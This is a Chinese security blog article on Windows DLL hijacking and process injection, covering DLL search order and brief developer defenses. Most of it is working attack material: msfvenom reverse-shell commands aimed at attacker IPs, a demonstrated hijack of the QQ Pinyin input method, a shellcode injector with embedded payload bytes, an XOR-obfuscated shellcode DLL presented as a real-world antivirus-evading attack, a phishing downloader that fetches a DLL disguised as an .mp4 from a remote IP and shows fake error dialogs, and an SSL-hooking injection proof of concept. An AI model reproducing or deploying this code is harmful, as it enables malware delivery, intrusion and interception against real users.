本文根据广东靓仔个人技术笔记整理
1. DLL劫持
通常情况下程序可以指定在运行时加载的DLL(Dynamic link Library,动态连接库)。不正确或模糊地指定所需DLL的程序可能会打开一个加载了意外DLL的漏洞。当Windows并行(WinSxS)清单对要加载的DLL的特性不够明确时,特别会发生旁加载漏洞。攻击者可能会利用容易受到侧向加载的合法程序来加载恶意DLL。攻击者可能会将这种技术用作掩盖他们在合法,受信任的系统或软件过程中执行的操作的手段。
1.1 关于DLL
DLL(Dynamic link Library,动态连接库)文件为动态链接库文件,又称"应用程序拓展",是软件文件类型。在Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件,放置于系统中。当我们执行某一个程序时,相应的DLL文件就会被调用。一个应用程序可使用多个DLL文件,一个DLL文件也可能被不同的应用程序使用,这样的DLL文件被称为共享DLL文件。
DLL劫持漏洞翻译成英文叫做DLL Hijacking Vulnerability, CWE将其归类为UntrustedSearch Path Vulnerability。
如果在进程尝试加载一个DLL时没有指定DLL的绝对路径,那么Windows会尝试去按照顺序搜索这些特定目录时下查找这个DLL,只要黑客能够将恶意的DLL放在优先于正常DLL所在的目录,就能够欺骗系统优先加载恶意DLL,来实现"劫持"。
1.2 DLL加载过程
动态链接库搜索顺序:DLL加载时,可以通过定义全路径、DLL重定向,以及使用manifest文件来控制加载路私。同时,若以上方式皆未用到,系统会按照特定搜索顺序定位DLL文件。特定搜索顺序包括标准和备用搜索顺序。标准搜索顺序是显示或隐式链接加载DLL时采用的默认方式,当采用显示链接方式LoadLibrary函数加载DLL时,若函数使用了LOAD_WITH_ALTERED_SEARCH_PATH参数,则启用备用搜索顺序。
Windows XP SP2之前:
在Windows XP SP2之前,Windows查找DLL的目录以及对应的顺序如下:
程序所在目录
程序加载目录(SetCurrentDirectory)
系统目录即 SYSTEM32 目录
16位系统目录即 SYSTEM 目录
Windows目录
PATH环境变量中列出的目录
winxdows xp sp2之后:
从Windows XP SP2开始,SafeDllSearchMode默认会被开启。SafeDllSearchMode的开启与否主要影响Current Directory( 当前目录) 在搜索顺序中的位置。开启SafeDllSearchMode后的DLL搜索顺序如下:
进程对应的应用程序所在目录
系统目录( 通过GetSystemDirectory获取)
16位系统目录
Windows目录(通过GetWindowsDirectory获取)
当前目录
PATH环境变量中的各个目录
启用SafeDllSearchMode之后可以防范大部分DLL劫持,如系统DLL劫持。如果进程尝试加载的DLL并不存在,那么进程仍然会尝试去当前目录加载这个DLL,这是 SafeDllSearchMode所无法防范的。不过微软引入了SetDllDirectory 这个 API ,给这个 API 传递一个空字符串就可以将当前目录从 DLL 搜索顺序中排除掉。
windows7以上:
系统没有了SafeDllSearchMode 而采用KnownDLLs,那么凡是此项下的DLL文件就会被禁止从EXE自身所在的目录下调用,而只能从系统目录即SYSTEM32目录下调用。
Windows操作系统通过"DLL路径搜索目录顺序"和"Know DLLs注册表项"的机制来确定应用程序所要调用的DLL的路径,之后,应用程序就将DLL载入了自己的内存空间,执行相应的函数功能。
KnownDLLs注册表项下包含一系列常见的系统dll,如usp10.dll、lpk.dll、shell32.dll、user32.dll
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerKnownDLLs
1.3 DLL挖掘
检查步骤:
启动应用程序
Process Monitor查看该应用程序启动后加载的动态链接库。
从该应用程序已经加载的DLL列表中,查找在上述"KnownDLLs注册表项"中不存在的DLL。
通过msf生成劫持的dll,改成劫持的dll名来测试是否存在劫持。
将编写好的劫持DLL放到该应用程序目录下,重新启动该应用程序,检测是否劫持成功。
QQ拼音输入法劫持:
官网最新版本输入法测试
启动程序:
通过观察,发现ntmarta.dll不存在KnownDLLs中,由于开发人员调用这DLL时候没有定义绝对路径,导致DLL搜索,可以直接在搜索到system32之前放入我们要劫持的DLL恶意文件实现劫持
msf生成反弹shell
./msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.237.165 LPORT=4433 -f dll > ~/Desktop/ntmarta.dll
将ntmarta.dll文件放入
C:Program Files (x86)TencentQQPinyin6.4.5804.400
当用户,输入聊天、切换输入法、重启等操作都会触发dll劫持获得一个Meterpreter会话。
这里可以通过Cobalt Strike 生成ShellCode自己编译dll文件来做到权限维持,这里dll执行shellcode的方式都有上十种来绕过或者无文件落地执行ShellCode,针对钓鱼攻击很有效果。
1.4 防御
劫持应用程序的DLL比劫持系统本身的DLL隐蔽性更好,安全软件难以判断这种"劫持行为"。
DLL劫持漏洞微软尚未给出直接的修复方法
这是开发者的失误,换用绝对路径就能避免这个问题
利用的前提是攻击者已经能够在同级目录放置文件,这代表系统已经被攻破
开发人员必须要做更多来保护应用程序自身。开发过程中,调用LoadLibrary,LoadLibraryEx等会进行模块加载操作的函数时,使用模块的物理路径作为参数。在程序调用DLL时使用“白名单”+ “签名”进行DLL的验证。或者在开发应用程序时,在代码开头调用SetDllDirectory函数,把当前目录从DLL的搜索顺序列表中删除,不过这个API只能在打了KB2533623补丁的Windows7,2008上使用。
DLL劫持漏洞本身不算高危漏洞但是如果将此漏洞与其他一些攻击技术进行捆绑组合,危害程度将会大幅提升,比如白利用。
2. Windows DLL、进程注入
进程注入简而言之就是将代码注入到正在运行的进程内存空间中,进程注入也是PC端软件开发必须掌握的一个基础知识点。
Windows为每个进程分配了4G内存空间,在这4G空间中的代码可以被这个进程访问执行。给软件“打补丁”实际上就是进程注入,想给已经上线的软件添加一个小功能,不需要重新设计软件,只需要将你需要添加功能的代码注入到进程中即可。
也有很多黑客利用进程注入将恶意代码注入到目标进程中进行攻击。
Windows环境下常用的进程注入方法有:CreateRemoteThread、APCInject、SuspendThread、SetWindowHookEX等。
此外还有一种比较奇特的注入方法:反射注入。反射注入主要是通过对PE文件的操作实现注入,注入成功率高,也最有学习价值。
DLL(Dynamic link Library,动态连接库)注入就是将一个DLL放进某个进程的地址空白空间里,让它成为那个进程的一度部分。要实现DLL注入,首先需要打开目标进程。既然问DLL放进了进程地址空间,进程当然改变,而且是通过进程去调用DLL的代码答,原来的进程的功能并不会改变,也不会导致进程不能使专用,如果你要DLL注入后,定时触发一些功能,DLL加载后建立定时的线程即可。
2.1 前提知识点
需要了解知识
C/C++ and Assembly
WinAPI
DLLs and DLL Injection
Windows Memory
一个DLL文件可以被多个进程所装载调用。
动态连接库是在EXE运行时被加载执行,静态库连接库是OBJ文件进行连接时同时被保存到程序中。
BOOL WINAPI DllMain(
_In_ HINSTANCE hinstDLL,
_In_ DWORD fdwReason,
_In_ LPVOID lpvReserved
);
hinstDLL该参数是当前DLL模块的句柄
fdwReason该参数表示DllMain()函数被调用的原因。
该参数的取值有4种
DLL_PROCESS_ATTACH
DLL_PROCESS_DETACH
DLL_THREAD_ATTACH
DLL_THREAD_DETACH
lpvReserved保留参数,即不被程序员使用的参数
示例代码:
extern HINSTANCE hAppInstance;
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
{
BOOL bReturnValue = TRUE;
switch( dwReason )
{
case DLL_QUERY_HMODULE:
if( lpReserved != NULL )
*(HMODULE *)lpReserved = hAppInstance;
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
MessageBoxA( NULL, "Hello from DllMain!", "Reflective Dll Injection", MB_OK );
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}
DllMain()函数不止一次被调用,根据调用的情况不同,需要执行不同的代码,以上写法是可以达到根据不同的调用原因执行不同的代码。
导出函数:
extern "C" _declspec(dllexport) void __cdecl bilibili(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine,int nCmdShow)
extern “C”表示该函数以C方式导出,由于源码是.cpp文件,如果按照C++方式导出,会在编译后函数名会被名字粉碎,导致在动态调用该函数时就会极为不方便。
作用是声明一个导出函数,将该函数从本DLL中开放提供给其他模块使用。
动态调用DLL:
typedef VOID(*PFUNMSG)(char *);
int main(int argh, char* argv[])
{
HMODULE hModule = LoadLibrary(“bilibili.dll”);
if( hModule == NULL )
{
MessageBox(NULL,”bilibili.dll文件不存在”,”DLL文件加截失败”,MB_OK);
return -1;
}
PFUNMSG pFunMsg = (PFUNMSG)GetProcAddress(hModule,”MsgBox”);
pFunMsg(“Hello bilibili dll!”);
return 0;
}
静态加载调用使用方便,而动态加载调用灵活性好。
HMODULE LoadLibraryA( LPCSTR lpLibFileName );
只有一个值,即要加载的DLL文件名,该函数调用成功,则反回一个模块句柄。
FARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName );
hModule通过LoadLibrary()函数或GetModuleHandle()函数获得;
lpProcName指定要获得函数地址的函数名称。
CFF Explorer查看dll文件信息
2.2 远程线程的编程
远程线程是跨进程的意思,进程A要在进程B中创建一个线程,这就叫远程线程。
DLL远程注入,木马或病毒编写的好坏取决隐藏的程度,而不在于其功能的多少。
DLL的运行不会单独创建一个进程,它的运行被加载到进程的地址空间中。
创建远程线程的函数CreateRemoteThread()
HANDLE CreateRemoteThread(
HANDLE hProcess,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
SIZE_T dwStackSize,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
DWORD dwCreationFlags,
LPDWORD lpThreadId
);
hProcess指定进程的句柄
lpStartAddress 指定线程函数的地址
lpParameter 传递给线程函数的参数
如何让线程函数的地址在目标进程中呢?
如何让线程函数的参数也可以传递到目标进程中呢?
如何确定DLL完整路径写入目标进程的哪个地址?
以下摘录自黑客windows API 编程:
可以直接把LoadLibrary()函数作为现成函数创建到指定的进程中。LoadLibrary()的参数是欲加载DLL的完整路径。只要在CreateRemoteThread()函数中赋值一个指向DLL 完整路径的指针给LoadLibrary()函数即可。这样使用CreateRemoteThread()函数就可以创建一个远程线程了。注:LoadLibrary()函数是系统中的Kernel32.dll的导出函数,Kernel32.dll这个DLL文件在任何进程中的加载位置都是相同的,也就是说LoadLibrary()函数的地址在任何进程中的地址也是相同的。因此,只要在进程中获取LoadLibrary()函数的地址只,那么该地址在目标进程中也可以使用。CreateRemoteThread()函数的线程地址参数直接传递给LoadLibrary()函数的地址即可。
实现功能是把lpBuffer中的内容写到进程句柄是hProcess进程的lpBaseAddress地址处,写入长度为nSize使用该函数把DLL文件完整地址写入目标进程中,在目标进程中用LoadLibrary()函数加载指定的DLL文件。
BOOL WriteProcessMemory(
HANDLE hProcess,
LPVOID lpBaseAddress,
LPCVOID lpBuffer,
SIZE_T nSize,
SIZE_T *lpNumberOfBytesWritten
);
hProcess 指定进程的进程句柄、
lpBaseAddress 指定写入目标进程内存的起始地址
lpBuffer 目标缓冲区起始地址
nSize 目标内存了中的缓冲区的长度
lpNumberOfBytesWritten 接收实际写入内容的长度
LPVOID VirtualAllocEx(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);
hProcess 指定进程的进程句柄
lpAddress 在目标进程中申请内存的起始地址
flAllocationType 指定早请内存的状态类型
flProtect 指定早请内存的属性
无DLL的代码注入实现
实际场景中的应用:
CreateRemoteThread Shellcode Injection
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=443 -f c -b x00x0ax0d
执行Shellcode的代码
int main(int argc, char *argv[])
{
unsigned char shellcode[] =
"x48x31xc9x48x81xe9xc6xffxffxffx48x8dx05xefxff"
"xffxffx48xbbx96x46x4fxacx46x65x22xabx48x31x58"
"x27x48x2dxf8xffxffxffxe2xf4x6ax0exccx48xb6x8d"
"xe2xabx96x46x0exfdx07x35x70xfaxc0x0ex7ex7ex23"
"x2dxa9xf9xf6x0exc4xfex5ex2dxa9xf9xb6x0exc4xde"
"x16x2dx2dx1cxdcx0cx02x9dx8fx2dx13x6bx3ax7ax2e"
"xd0x44x49x02xeax57x8fx42xedx47xa4xc0x46xc4x07"
"x1exe4xcdx37x02x20xd4x7ax07xadx96xeexa2x23x96"
"x46x4fxe4xc3xa5x56xccxdex47x9fxfcxcdx2dx3axef"
"x1dx06x6fxe5x47xb5xc1xfdxdexb9x86xedxcdx51xaa"
"xe3x97x90x02x9dx8fx2dx13x6bx3ax07x8ex65x4bx24"
"x23x6axaexa6x3ax5dx0ax66x6ex8fx9ex03x76x7dx33"
"xbdx7axefx1dx06x6bxe5x47xb5x44xeax1dx4ax07xe8"
"xcdx25x3exe2x97x96x0ex27x42xedx6axaax46x07x17"
"xedx1ex3bx7bxf1xd7x1ex0exf5x07x3fx6ax28x7ax66"
"x0exfexb9x85x7axeaxcfx1cx07x27x54x8cx75x54x69"
"xb9x12xe5xf8x12x51x99xc9x75x7dxacx46x24x74xe2"
"x1fxa0x07x2dxaaxc5x23xabx96x0fxc6x49x0fxd9x20"
"xabx87x17x8fx04x45x37x63xffxdfxcfxabxe0xcfx94"
"x63x11xdax31x69xabxb9xb0x6ex22x7cx2ex4exadx46"
"x65x7bxeax2cx6fxcfxc7x46x9axf7xfbxc6x0bx7ex65"
"x0bx54xe2xe3x69x86x07x25x84x2dxddx6bxdexcfx8e"
"xedxfcx8fx2dx74x76xb9x9axe4xcfxa2x48xbbxd7x1e"
"x03x25xa4x2dxabx52xd7xfcxd6x09x32x04xddx7exde"
"xc7x8bxecx44x65x22xe2x2ex25x22xc8x46x65x22xab"
"x96x07x1fxedx16x2dxabx49xc1x11x18xe1x77xa5x48"
"xa6xcfx07x1fx4exbax03xe5xefxb2x12x4exadx0exe8"
"x66x8fx8ex80x4fxc4x0execxc4xfdxc6x07x1fxedx16"
"x24x72xe2x69x86x0exfcx0fx9axeaxe6x1fx87x03x25"
"x87x24x98xd2x5ax79xc9x53x93x2dx13x79xdexb9x85"
"x27x48x24x98xa3x11x5bx2fx53x93xdexd2x1ex34x10"
"x0ex16xe0xf0x9fx36x69x93x07x2fx82x4dx1exadxea"
"x4cxcfx57xa6x10x27x10xd1x55x3dxc3x2cx65x7bxea"
"x1fx9cxb0x79x46x65x22xab";
HANDLE processHandle;
HANDLE remoteThread;
PVOID remoteBuffer;
printf("Injecting to PID: %i", atoi(argv[1]));
processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
CloseHandle(processHandle);
return 0;
}
总结:
DLL注入工作原理:就是从外部促使目标进程调用LoadLibrary() API,强制调用执行DLL的DllMain()函数。
并且。被注入的DLL拥有目标进程内存的访问权限,用户可以随意操作。
用于改善功能与修复Bug,没有程序对应的源码,或直接修改程序比较困难时,就可以使用DLL注入技术为程序添加新功能。
2.3 反射式DLL注入
反射DLL注入是一种允许攻击者从内存而非磁盘向受害进程注入DLL的技术。
执行将通过CreateRemoteThread()或一个很小的引导程序Shellcode传递到库的ReflectiveLoader函数,该函数是在库的导出表中找到的导出函数。
实战某卫星部门攻击手法:
实现一个下载器,下载DLL文件通过Rundll32进行加载
采用了异或解码 shellcode绕过杀软。
dllmain.cpp
// dllmain.cpp : 定义 DLL 应用程序的入口点。
//#include "Win32Project6.h"
typedef void(_stdcall *CODE)();
// 这是导出变量的一个示例
//WIN32PROJECT6_API int nWin32Project6 = 0;
extern "C" _declspec(dllexport) void __cdecl bilibili(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine,
int nCmdShow)
{
CHAR cpu_code[] = "xf5xe1x80x09x09x09x69x80xecx38xdbx6dx82x5bx39x82x5bx05x82x5bx1dx82x7bx21x06xbex43x2fx38xf6x38xc9xa5x35x68x75x0bx25x29xc8xc6x04x08xcexebxf9x5bx5ex82x5bx19x82x4bx35x08xd9x82x49x71x8cxc9x7dx43x08xd9x59x82x41x11x82x51x29x08xdaxeax35x40x82x3dx82x08xdfx38xf6x38xc9xa5xc8xc6x04x08xcex31xe9x7cxfdx0ax74xf1x32x74x2dx7cxebx51x82x51x2dx08xdax6fx82x05x42x82x51x15x08xdax82x0dx82x08xd9x80x4dx2dx2dx52x52x68x50x53x58xf6xe9x51x56x53x82x1bxe2x8fx54x61x67x6cx7dx09x61x7ex60x67x60x5dx61x45x7ex2fx0exf6xdcx38xf6x5ex5ex5ex5ex5ex61x33x5fx70xaexf6xdcxe0x8dx09x09x09x52x38xc0x58x58x63x0ax58x58x61x99x16x09x09x5ax59x61x5ex80x96xcfxf6xdcxe2x79x52x38xdbx5bx61x09x0bx69x8dx5bx5bx5bx5ax5bx59x61xe2x5cx27x32xf6xdcx80xcfx8axcax59x38xf6x5ex5ex63xf6x5ax5fx61x24x0fx11x72xf6xdcx8cxc9x06x8dxcax08x09x09x38xf6x8cxffx7dx0dx80xf0xe2x00x61xa3xccxebx54xf6xdcx80xc8x61x4cx28x57x38xf6xdcx38xf6x5ex63x0ex58x5fx59x61xbex5exe9x02xf6xdcxb6x09x26x09x09x30xcex7dxbex38xf6xe0x98x08x09x09xe0xc0x08x09x09xe1x82xf6xf6xf6x26x5bx6fx62x30x09xa8xdax09x55x92x8fxeax00x29xbax02x34x15xc1xb1x4fx81x6bx07x34xa4xeaxf8xacxd9x1ax02x38xcdxf0xd9x38x47x8bx92x22x0cx84x0fxd5x3bx8ex56x7cxe7xe0x36x87xc1x16x9bx6bx38xd9xeex17xafx00x52x0exd1x14xddx91xb7x5bx37xcbxd7x9cx11x9bx2bx09x5cx7ax6cx7bx24x48x6ex6cx67x7dx33x29x44x66x73x60x65x65x68x26x3cx27x39x29x21x6ax66x64x79x68x7dx60x6bx65x6cx32x29x44x5ax40x4cx29x30x27x39x32x29x5ex60x67x6dx66x7ex7ax29x47x5dx29x3fx27x38x32x29x5dx7bx60x6dx6cx67x7dx26x3cx27x39x32x29x4bx46x40x4cx30x32x4cx47x51x48x20x04x03x09xf8xa0x3cx4exfax1ax3cxe4x06x61x3fx85x23x68xacx34xf7xb8xd6x8bx90x52x88xb6xb9xdcx7axa0x25xc7xe5x0cxdexd8x12x0ax33x65x1fxf3x22x9bxd5xa5xebx84xcdxf1x05xddx32x80x69xbax3cx40x4bx82xbdx89x8fx46xbax7fx0fx3bxccx6bx0bx92x33xa5x42xdexe8xecxa7x46xeaxc6x10x70x4dx22xcexc8x78x39x49x3ex76xe1xa4xa3xafxf2x57x65xfdxc6x9dx55x44xe9xe3x42x8fx47xebx6bx11x5fx73x4cx2dx4exb5xc9xdexc8xebx4exe3xaax08xf7xc4x93x39x21x83x96x8ex55xbax69xb3xf0x13x67x79x5fx7dx66x0ex80xa7x18x23x7dx40x82x69xb5xe1x09x12xacx87x56x4dx42xe2xe4x19x21xbdx74x49xd4xabxf4xfbxb2x65xe9x3cx8ex56xeex67x45xc2xc5xfdx59x02x0fx42xb0xdex13x26x92x13xb4x2exe8x2bx2cx5ex0cxcfx3ex29xd8x44x9cx26x27x16x87xb6x09x61xf9xbcxabx5fxf6xdcx63x49x61x09x19x09x09x61x09x09x49x09x5ex61x51xadx5axecxf6xdcx9axb0x09x09x09x09x08xd0x58x5ax80xeex5ex61x09x29x09x09x5ax5fx61x1bx9fx80xebxf6xdcx8cxc9x7dxcfx82x0ex08xcax8cxc9x7cxecx51xcaxe1xa0xf4xf6xf6x38x3ax27x3bx3cx39x27x38x38x3dx27x30x3bx09xe3xf2xaax53";
DWORD dwCodeLength = sizeof(cpu_code);
DWORD dwOldProtect = NULL;
for (DWORD i = 0; i < dwCodeLength; i++) {
cpu_code[i] ^= 9;
}
for (DWORD i = 0; i < dwCodeLength; i++) {
cpu_code[i] ^= 7;
}
for (DWORD i = 0; i < dwCodeLength; i++) {
cpu_code[i] ^= 7;
}
for (DWORD i = 0; i < dwCodeLength; i++) {
cpu_code[i] ^= 5;
}
for (DWORD i = 0; i < dwCodeLength; i++) {
cpu_code[i] ^= 5;
}
for (DWORD i = 0; i < dwCodeLength; i++) {
cpu_code[i] ^= 3;
}
for (DWORD i = 0; i < dwCodeLength; i++) {
cpu_code[i] ^= 3;
}
for (DWORD i = 0; i < dwCodeLength; i++) {
cpu_code[i] ^= 9;
}
for (DWORD i = 0; i < dwCodeLength; i++) {
cpu_code[i] ^= 9;
}
for (DWORD i = 0; i < dwCodeLength; i++) {
cpu_code[i] ^= 9;
}
for (DWORD i = 0; i < dwCodeLength; i++) {
cpu_code[i] ^= 9;
}
PVOID pCodeSpace = VirtualAlloc(NULL, dwCodeLength, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (pCodeSpace != NULL)
{
CopyMemory(pCodeSpace, cpu_code, dwCodeLength);
Sleep(500);
VirtualProtect(pCodeSpace, dwCodeLength, PAGE_EXECUTE, &dwOldProtect);
CODE coder = (CODE)pCodeSpace;
HANDLE hThread = CreateThread(NULL, 0, (PTHREAD_START_ROUTINE)coder, NULL, 0, NULL);
WaitForSingleObject(hThread, INFINITE);
}
return;
}
下载器:
using namespace std;
HRESULT DownloadFile(PTCHAR URL, PTCHAR File);
static TCHAR URL[] = TEXT("http://13.11.11.92:8000/fsdfsdad.mp4");
static TCHAR SaveFile[MAX_PATH];
static TCHAR FileName[] = TEXT("\bilibili.dll");
static TCHAR CommandLine[] = TEXT("C:\Windows\System32\rundll32.exe");
// 下载文件
HRESULT DownloadFile(PTCHAR URL, PTCHAR File) {
HRESULT hr = URLDownloadToFile(0, URL, File, 0, NULL);
return hr;
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow)
{
ZeroMemory(SaveFile, MAX_PATH);
GetEnvironmentVariable(TEXT("TMP"), SaveFile, MAX_PATH);
lstrcatW(SaveFile, FileName);
if (DownloadFile(URL, SaveFile) != S_OK)
{
//wprintf(TEXT("Error: %d n"), GetLastError());
MessageBox(NULL, TEXT("文档打开失败,请重新打开!"), TEXT("error !"), MB_ICONWARNING | MB_OK);
return 0;
}
lstrcatW(SaveFile, TEXT(",bilibili"));
TCHAR opt[MAX_PATH];
ZeroMemory(opt, MAX_PATH);
lstrcatW(opt, TEXT(" "));
lstrcatW(opt, SaveFile);
PROCESS_INFORMATION pi;
STARTUPINFO si = { sizeof(si) };
si.cb = sizeof(si);
si.wShowWindow = TRUE;
CreateProcess(
TEXT("C:\Windows\System32\rundll32.exe"),
opt,
NULL,
NULL,
FALSE,
CREATE_NEW_CONSOLE,
NULL,
NULL,
&si,
&pi);
cout << GetLastError() << endl;
MessageBox(NULL, TEXT("文档损坏!"), TEXT("error !"), MB_OK | MB_ICONINFORMATION);
return 0;
}
2.4 Mavinject | Dll Injected
Mavinject是一个合法的Windows组件,可以在任何正在运行的进程中使用,并执行任意代码注入。由于这是Windows上的一个常见组件,因此可以利用它来执行无人区域的攻击。
可执行文件System32和SysWOW64目录中。
T1055.cpp
#define SECURITY_WIN32 //Define First Before Imports.
#include <windows.h>
#include <stdio.h>
#include <Sspi.h> //Be sure to reference secur32.lib in Linker | Input | Additional Dependencies
FARPROC fpEncryptMessage; //Pointer To The Original Location
BYTE bSavedByte; //Saved Byte Overwritten by 0xCC -
FARPROC fpDecryptMessage; //Pointer To The Original Location
BYTE bSavedByte2; //Saved Byte Overwritten by 0xCC -
// Original Idea/Reference Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// PoC by Casey Smith @subTee
// From PowerShell
// mavinject.exe $pid /INJECTRUNNING C:AtomicTestsAtomicSSLHookx64.dll
// curl https://www.example.com
// Should Hook and Display Request/Response from HTTPS
BOOL WriteMemory(FARPROC fpFunc, LPCBYTE b, SIZE_T size) {
DWORD dwOldProt = 0;
if (VirtualProtect(fpFunc, size, PAGE_EXECUTE_READWRITE, &dwOldProt) == FALSE) {
return FALSE;
}
MoveMemory(fpFunc, b, size);
return VirtualProtect(fpFunc, size, dwOldProt, &dwOldProt);
}
//TODO, Combine HOOK Function To take 2 params. DLL and Function Name.
VOID HookFunction(VOID) {
fpEncryptMessage = GetProcAddress(LoadLibrary(L"sspicli.dll"), "EncryptMessage");
if (fpEncryptMessage == NULL) {
return;
}
bSavedByte = *(LPBYTE)fpEncryptMessage;
const BYTE bInt3 = 0xCC;
if (WriteMemory(fpEncryptMessage, &bInt3, sizeof(BYTE)) == FALSE) {
ExitThread(0);
}
}
VOID HookFunction2(VOID) {
fpDecryptMessage = GetProcAddress(LoadLibrary(L"sspicli.dll"), "DecryptMessage");
if (fpDecryptMessage == NULL) {
return;
}
bSavedByte2 = *(LPBYTE)fpDecryptMessage;
const BYTE bInt3 = 0xCC;
if (WriteMemory(fpDecryptMessage, &bInt3, sizeof(BYTE)) == FALSE) {
ExitThread(0);
}
}
SECURITY_STATUS MyEncryptMessage(
PCtxtHandle phContext,
ULONG fQOP,
PSecBufferDesc pMessage,
ULONG MessageSeqNo
)
{
char* buffer = (char*)((DWORD_PTR)(pMessage->pBuffers->pvBuffer) + 0x29); //Just Hardcode for PoC
::MessageBoxA(NULL, buffer, "MITM Intercept", 0);
if (WriteMemory(fpEncryptMessage, &bSavedByte, sizeof(BYTE)) == FALSE) {
ExitThread(0);
}
SECURITY_STATUS SEC_EntryRet = EncryptMessage(phContext, fQOP, pMessage, MessageSeqNo);
HookFunction();
return SEC_EntryRet;
}
SECURITY_STATUS MyDecryptMessage(
PCtxtHandle phContext,
PSecBufferDesc pMessage,
ULONG MessageSeqNo,
ULONG fQOP
)
{
if (WriteMemory(fpDecryptMessage, &bSavedByte2, sizeof(BYTE)) == FALSE) {
ExitThread(0);
}
SECURITY_STATUS SEC_EntryRet = DecryptMessage(phContext, pMessage, MessageSeqNo, &fQOP );
char* buffer = (char*)(pMessage->pBuffers->pvBuffer);
::MessageBoxA(NULL, buffer, "MITM Intercept", 0);
HookFunction2();
return SEC_EntryRet;
}
LONG WINAPI
MyVectoredExceptionHandler1(
struct _EXCEPTION_POINTERS *ExceptionInfo
)
{
UNREFERENCED_PARAMETER(ExceptionInfo);
#ifdef _WIN64
if (ExceptionInfo->ContextRecord->Rip == (DWORD_PTR)fpEncryptMessage) {
ExceptionInfo->ContextRecord->Rip = (DWORD_PTR)MyEncryptMessage;
}
if (ExceptionInfo->ContextRecord->Rip == (DWORD_PTR)fpDecryptMessage) {
ExceptionInfo->ContextRecord->Rip = (DWORD_PTR)MyDecryptMessage;
}
#else
if (ExceptionInfo->ContextRecord->Eip == (DWORD_PTR)fpEncryptMessage) {
ExceptionInfo->ContextRecord->Eip = (DWORD_PTR)MyEncryptMessage;
}
if (ExceptionInfo->ContextRecord->Eip == (DWORD_PTR)fpDecryptMessage) {
ExceptionInfo->ContextRecord->Eip = (DWORD_PTR)MyDecryptMessage;
}
#endif
return EXCEPTION_CONTINUE_SEARCH;
}
BOOL APIENTRY DllMain(HANDLE hInstance, DWORD fdwReason, LPVOID lpReserved) {
switch (fdwReason) {
case DLL_PROCESS_ATTACH:
AddVectoredExceptionHandler(1, (PVECTORED_EXCEPTION_HANDLER)MyVectoredExceptionHandler1);
HookFunction();
HookFunction2();
::MessageBoxA(NULL, "Locked and Loaded!", "Boom!", 0);
break;
}
return TRUE;
}
使用方法
MavInject.exe <PID> /INJECTRUNNING <PATH DLL>
参考文献:
https://github.com/suvllian/process-inject
在Windows环境下的进程注入方法:远程线程注入、创建进程挂起注入、反射注入、APCInject、SetWindowHookEX注入
DLL劫持、COM劫持、Bypass UAC利用与挖掘
https://www.bilibili.com/video/av51718274
http://www.secist.com/archives/5912.html
https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
本文始发于微信公众号(关注安全技术):DLL劫持与注入
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论